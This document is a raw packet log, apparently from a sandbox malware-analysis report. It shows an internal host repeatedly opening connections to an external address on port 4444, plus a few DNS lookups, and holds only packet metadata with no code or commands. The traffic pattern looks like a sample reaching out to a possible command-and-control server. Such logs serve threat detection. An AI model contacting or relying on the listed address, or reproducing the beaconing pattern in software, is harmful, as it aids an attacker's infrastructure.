Oct 16, 2024 10:08:39.881573915 CEST	4444	50896	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:39.883073092 CEST	4444	50898	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:39.883202076 CEST	50898	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:39.885929108 CEST	50898	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:39.890958071 CEST	4444	50898	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:40.564882994 CEST	4444	50898	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:40.566148996 CEST	50898	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:40.568727970 CEST	50898	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:40.570234060 CEST	50900	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:40.573623896 CEST	4444	50898	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:40.575192928 CEST	4444	50900	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:40.575270891 CEST	50900	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:40.578041077 CEST	50900	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:40.583101034 CEST	4444	50900	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:41.255029917 CEST	4444	50900	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:41.258107901 CEST	50900	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:41.258944035 CEST	50900	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:41.260359049 CEST	50902	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:41.263988972 CEST	4444	50900	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:41.265342951 CEST	4444	50902	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:41.265449047 CEST	50902	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:41.268239975 CEST	50902	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:41.273185968 CEST	4444	50902	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:41.963571072 CEST	4444	50902	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:41.966075897 CEST	50902	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:41.967459917 CEST	50902	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:41.968686104 CEST	50904	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:41.972594976 CEST	4444	50902	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:41.973788977 CEST	4444	50904	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:41.973937988 CEST	50904	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:41.976325989 CEST	50904	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:41.981334925 CEST	4444	50904	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:42.652990103 CEST	4444	50904	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:42.654140949 CEST	50904	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:42.657838106 CEST	50904	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:42.659404993 CEST	50906	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:42.662769079 CEST	4444	50904	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:42.664489985 CEST	4444	50906	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:42.664549112 CEST	50906	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:42.666389942 CEST	50906	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:42.671284914 CEST	4444	50906	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:43.380038023 CEST	4444	50906	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:43.382081032 CEST	50906	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:43.382606983 CEST	50906	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:43.383734941 CEST	50908	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:43.387471914 CEST	4444	50906	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:43.388691902 CEST	4444	50908	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:43.388828039 CEST	50908	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:43.390332937 CEST	50908	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:43.395252943 CEST	4444	50908	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:44.070980072 CEST	4444	50908	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:44.074095011 CEST	50908	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:44.075608015 CEST	50908	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:44.076657057 CEST	50910	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:44.080862999 CEST	4444	50908	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:44.082010031 CEST	4444	50910	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:44.082082033 CEST	50910	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:44.084495068 CEST	50910	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:44.089689016 CEST	4444	50910	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:44.757749081 CEST	4444	50910	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:44.758133888 CEST	50910	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:44.760761023 CEST	50910	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:44.761789083 CEST	50912	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:44.765722036 CEST	4444	50910	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:44.766792059 CEST	4444	50912	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:44.766874075 CEST	50912	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:44.769517899 CEST	50912	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:44.774447918 CEST	4444	50912	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:45.439565897 CEST	4444	50912	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:45.442830086 CEST	50912	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:45.444032907 CEST	50914	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:45.447926044 CEST	4444	50912	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:45.449038029 CEST	4444	50914	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:45.449124098 CEST	50914	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:45.451272011 CEST	50914	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:45.456216097 CEST	4444	50914	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:46.129054070 CEST	4444	50914	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:46.130124092 CEST	50914	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:46.132534027 CEST	50914	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:46.133789062 CEST	50916	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:46.138031006 CEST	4444	50914	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:46.138696909 CEST	4444	50916	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:46.138780117 CEST	50916	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:46.140913963 CEST	50916	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:46.146022081 CEST	4444	50916	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:46.827351093 CEST	4444	50916	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:46.830116987 CEST	50916	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:46.830554962 CEST	50916	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:46.831787109 CEST	50918	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:46.835474014 CEST	4444	50916	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:46.836787939 CEST	4444	50918	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:46.836920977 CEST	50918	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:46.840220928 CEST	50918	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:46.845113039 CEST	4444	50918	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:47.515372038 CEST	4444	50918	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:47.517739058 CEST	50918	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:47.518419027 CEST	50920	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:47.522725105 CEST	4444	50918	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:47.523292065 CEST	4444	50920	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:47.523370981 CEST	50920	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:47.525166035 CEST	50920	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:47.529973984 CEST	4444	50920	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:48.191324949 CEST	4444	50920	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:48.194097042 CEST	50920	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:48.195847988 CEST	50920	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:48.197166920 CEST	50922	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:48.200772047 CEST	4444	50920	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:48.202096939 CEST	4444	50922	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:48.202192068 CEST	50922	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:48.205338001 CEST	50922	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:48.210221052 CEST	4444	50922	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:48.879590034 CEST	4444	50922	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:48.882091045 CEST	50922	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:48.883378983 CEST	50922	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:48.884869099 CEST	50924	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:48.888278008 CEST	4444	50922	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:48.889839888 CEST	4444	50924	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:48.889940977 CEST	50924	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:48.893517017 CEST	50924	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:48.898443937 CEST	4444	50924	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:49.588232994 CEST	4444	50924	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:49.590100050 CEST	50924	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:49.591495991 CEST	50924	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:49.592706919 CEST	50926	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:49.596333981 CEST	4444	50924	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:49.597671032 CEST	4444	50926	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:49.597765923 CEST	50926	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:49.600457907 CEST	50926	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:49.605335951 CEST	4444	50926	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:50.299906969 CEST	4444	50926	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:50.302138090 CEST	50926	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:50.304047108 CEST	50926	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:50.305649042 CEST	50928	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:50.308907032 CEST	4444	50926	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:50.310684919 CEST	4444	50928	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:50.310767889 CEST	50928	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:50.313514948 CEST	50928	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:50.318444014 CEST	4444	50928	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:50.998785019 CEST	4444	50928	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:51.001771927 CEST	50928	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:51.003246069 CEST	50930	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:51.006887913 CEST	4444	50928	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:51.008327961 CEST	4444	50930	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:51.008455992 CEST	50930	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:51.010413885 CEST	50930	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:51.015419006 CEST	4444	50930	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:52.007005930 CEST	4444	50930	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:52.007307053 CEST	4444	50930	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:52.007421017 CEST	50930	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:52.010736942 CEST	50930	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:52.012511969 CEST	50932	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:52.015625954 CEST	4444	50930	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:52.017425060 CEST	4444	50932	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:52.017501116 CEST	50932	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:52.020200968 CEST	50932	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:52.025104046 CEST	4444	50932	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:52.796055079 CEST	4444	50932	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:52.798101902 CEST	50932	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:52.799288988 CEST	50932	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:52.800307035 CEST	50934	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:52.804167032 CEST	4444	50932	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:52.805260897 CEST	4444	50934	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:52.805413961 CEST	50934	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:52.806874037 CEST	50934	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:52.812041998 CEST	4444	50934	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:53.485055923 CEST	4444	50934	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:53.486217022 CEST	50934	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:53.488334894 CEST	50934	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:53.489593029 CEST	50936	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:53.494904041 CEST	4444	50934	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:53.496586084 CEST	4444	50936	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:53.496690035 CEST	50936	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:53.498272896 CEST	50936	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:53.504811049 CEST	4444	50936	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:54.174894094 CEST	4444	50936	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:54.178231001 CEST	50936	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:54.178373098 CEST	50936	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:54.179285049 CEST	50938	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:54.183402061 CEST	4444	50936	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:54.184137106 CEST	4444	50938	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:54.184220076 CEST	50938	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:54.187310934 CEST	50938	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:54.192389011 CEST	4444	50938	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:55.147737026 CEST	4444	50938	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:55.147883892 CEST	4444	50938	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:55.148055077 CEST	50938	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:55.152520895 CEST	50938	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:55.154206038 CEST	50940	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:55.157325983 CEST	4444	50938	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:55.159141064 CEST	4444	50940	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:55.159230947 CEST	50940	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:55.163028002 CEST	50940	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:55.167983055 CEST	4444	50940	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:55.830230951 CEST	4444	50940	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:55.834100962 CEST	50940	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:55.835359097 CEST	50940	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:55.836983919 CEST	50942	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:55.840203047 CEST	4444	50940	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:55.841900110 CEST	4444	50942	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:55.841964006 CEST	50942	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:55.843921900 CEST	50942	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:55.848782063 CEST	4444	50942	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:56.522003889 CEST	4444	50942	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:56.523586035 CEST	50942	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:56.524211884 CEST	50944	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:56.529474020 CEST	4444	50942	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:56.529491901 CEST	4444	50944	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:56.529561043 CEST	50944	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:56.530592918 CEST	50944	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:56.535548925 CEST	4444	50944	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:57.210314035 CEST	4444	50944	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:57.212044954 CEST	50944	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:57.212589025 CEST	50946	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:57.217020988 CEST	4444	50944	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:57.217542887 CEST	4444	50946	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:57.217611074 CEST	50946	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:57.219002962 CEST	50946	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:57.223844051 CEST	4444	50946	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:58.123938084 CEST	4444	50946	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:58.124650955 CEST	4444	50946	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:58.124878883 CEST	50946	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:58.127342939 CEST	50946	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:58.128598928 CEST	50948	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:58.132365942 CEST	4444	50946	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:58.133641958 CEST	4444	50948	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:58.133766890 CEST	50948	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:58.136013031 CEST	50948	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:58.140983105 CEST	4444	50948	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:58.821147919 CEST	4444	50948	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:58.822086096 CEST	50948	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:58.822941065 CEST	50948	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:58.823551893 CEST	50950	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:58.829204082 CEST	4444	50948	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:58.829835892 CEST	4444	50950	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:58.829906940 CEST	50950	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:58.831618071 CEST	50950	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:58.837903976 CEST	4444	50950	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:59.506601095 CEST	4444	50950	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:59.509848118 CEST	50950	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:59.511444092 CEST	50952	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:59.514756918 CEST	4444	50950	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:59.516452074 CEST	4444	50952	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:59.516547918 CEST	50952	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:59.518465996 CEST	50952	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:59.523358107 CEST	4444	50952	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:00.215167999 CEST	4444	50952	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:00.218075037 CEST	50952	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:00.218314886 CEST	50952	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:00.219572067 CEST	50954	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:00.223185062 CEST	4444	50952	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:00.224756956 CEST	4444	50954	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:00.224812031 CEST	50954	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:00.226491928 CEST	50954	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:00.231628895 CEST	4444	50954	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:01.101628065 CEST	4444	50954	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:01.102099895 CEST	50954	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:01.105221033 CEST	50954	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:01.106565952 CEST	50956	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:01.110625029 CEST	4444	50954	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:01.111973047 CEST	4444	50956	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:01.112062931 CEST	50956	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:01.114032984 CEST	50956	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:01.118922949 CEST	4444	50956	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:01.790728092 CEST	4444	50956	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:01.793978930 CEST	50956	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:01.795701027 CEST	50958	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:01.798939943 CEST	4444	50956	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:01.800574064 CEST	4444	50958	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:01.800645113 CEST	50958	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:01.804799080 CEST	50958	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:01.809590101 CEST	4444	50958	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:02.489075899 CEST	4444	50958	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:02.490159035 CEST	50958	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:02.491523981 CEST	50958	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:02.492352962 CEST	50960	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:02.497680902 CEST	4444	50958	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:02.498408079 CEST	4444	50960	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:02.498485088 CEST	50960	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:02.500157118 CEST	50960	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:02.505573988 CEST	4444	50960	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:03.184302092 CEST	4444	50960	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:03.190129042 CEST	50960	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:03.238089085 CEST	50960	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:03.239639997 CEST	50962	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:03.243169069 CEST	4444	50960	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:03.244580030 CEST	4444	50962	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:03.244821072 CEST	50962	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:03.247307062 CEST	50962	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:03.252770901 CEST	4444	50962	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:04.995925903 CEST	4444	50962	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:04.997138977 CEST	4444	50962	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:04.997183084 CEST	50962	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:04.998456001 CEST	4444	50962	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:04.998492956 CEST	50962	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:04.999104023 CEST	50962	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:05.000324965 CEST	50964	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:05.005537987 CEST	4444	50962	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:05.006824970 CEST	4444	50964	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:05.006895065 CEST	50964	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:05.008147955 CEST	50964	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:05.012924910 CEST	4444	50964	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:05.688443899 CEST	4444	50964	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:05.690146923 CEST	50964	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:05.691188097 CEST	50964	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:05.692152023 CEST	50966	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:05.697606087 CEST	4444	50964	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:05.698673010 CEST	4444	50966	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:05.698761940 CEST	50966	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:05.700273991 CEST	50966	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:05.705256939 CEST	4444	50966	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:06.388501883 CEST	4444	50966	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:06.390064001 CEST	50966	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:06.390607119 CEST	50966	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:06.391454935 CEST	50968	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:06.395533085 CEST	4444	50966	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:06.396298885 CEST	4444	50968	27.30.77.93	192.168.2.13
Oct 16, 2024 10:09:06.396374941 CEST	50968	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:06.397712946 CEST	50968	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:09:06.404611111 CEST	4444	50968	27.30.77.93	192.168.2.13

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 16, 2024 10:07:07.185023069 CEST	49467	53	192.168.2.13	8.8.8.8
Oct 16, 2024 10:07:07.186002970 CEST	46921	53	192.168.2.13	8.8.8.8
Oct 16, 2024 10:07:07.193970919 CEST	53	46921	8.8.8.8	192.168.2.13
Oct 16, 2024 10:07:07.201395988 CEST	53	49467	8.8.8.8	192.168.2.13

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
